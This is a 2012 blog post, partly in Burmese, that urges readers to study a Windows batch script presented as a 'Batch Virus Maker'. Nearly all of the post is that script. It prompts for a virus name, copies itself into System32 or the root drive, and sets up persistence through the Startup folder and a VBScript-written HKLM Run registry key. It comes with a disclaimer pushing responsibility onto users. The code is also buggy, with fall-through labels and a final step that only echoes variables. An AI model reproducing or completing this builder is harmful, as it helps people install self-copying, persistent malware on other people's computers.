Friday, 25 May 2012


ကဲသူငယ္ခ်င္းတုိ့ေရ ေလ့လာႀကည့္ပါေနာ္ သူမ်ားကိုလိုက္တိုက္ခိုက္ေနတဲ့ virus ဟာအထီးလားအမလားသိေအာင္ မိမိတို့ကိုယ္တိုင္ေလ့လာမွတတ္လိမ့္မယ္ေနာ္


@echo off
color 1b
echo       *********************************************************************
echo       ***         DtH Corporation Presents:          ***
echo       ***         ========================================              ***
echo       *** ------------------------------------------------------------- ***
echo       ***   Batch Virus Maker v1.0     ***
echo       *** ------------------------------------------------------------- ***
echo       ***   By: Moneyking89!!!!!                                                   ***
echo       *** ==============================================================***
echo       ***+++++++++++++++++             ***
echo       *** This Virus making program is used under the owners own accord            ***
echo       *** If you get in trouble for this program it is your fault.
echo       *** Do not continue if you cant abide to this.             ***
echo       ***+++++++++++++++++             ***
echo       *********************************************************************




echo 1.) Please choose a name for your virus.
SET /P bvm=******Virus Name: 
if "%bvm%"=="*" (goto vname)
cls
:vname
set vname=%bvm%





echo 2.) What is your (Virus Creators) name?
set /p bvm=****Creator: 
if "%bvm%"=="*" (goto creator)
cls
:creator
set creator=%bvm% 






echo 3.) Save Virus to: 
echo Choices are: s=System32 c=C:\ 
echo Dont forget you can pick more than one. (s+c) would mean both together.
SET /P bvm=*****Save To: 
cls
if "%bvm%"=="c" (goto c)
if "%bvm%"=="d" (goto d)
:s
set saveto=copy %0 "%windir%\system32"
:c
set saveto=copy %0 "%homedrive%"




echo 4.) Please choose a background color for your virus.
echo colors include: yellow, red, green, blue, black.
SET /P bvm=*****Color: 
if "%bvm%"=="yellow" (goto yellow)
if "%bvm%"=="red" (goto red)
if "%bvm%"=="green" (goto green)
if "%bvm%"=="blue" (goto blue)
if "%bvm%"=="black" (goto black)
:yellow
set background=color e7
:red
set background=color 47
:green
set background=color 27
:blue
set background=color 97
:black
set background=color 07
cls


echo 5.) Copies itself to: a=Startup, b=Registry(run). (Put the correct letter: "a" would be for startup.) 
echo Dont forget you can pick more than one. (a+b) would mean both together.
echo Choices are: a=Startup b=Registry a+b= Both..
SET /P bvm=****Startup Method: 
if "%bvm%"=="a" (goto a)
if "%bvm%"=="b" (goto b)
if "%bvm%"=="a+b" (goto a+b)
cls
:a
set startup=copy %0 "C:\Documents and Settings/%username%/Start Menu/Programs/Startup"
:b
echo Save in Registry as:
SET /P BVM=****Regname:  
if "%bvm%"=="*" (goto regname)
:regname
set regname=%bvm%
set startup=Set WshShell = WScript.CreateObject("WScript.Shell")
echo %startup%>Reg.vbe
set startup=WshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\%regname%", "%saveto%\%vname%", "REG_SZ"
echo %startup%>>Reg.vbe
cls



cd \
echo %vname% %creator% %saveto% %background% %startup%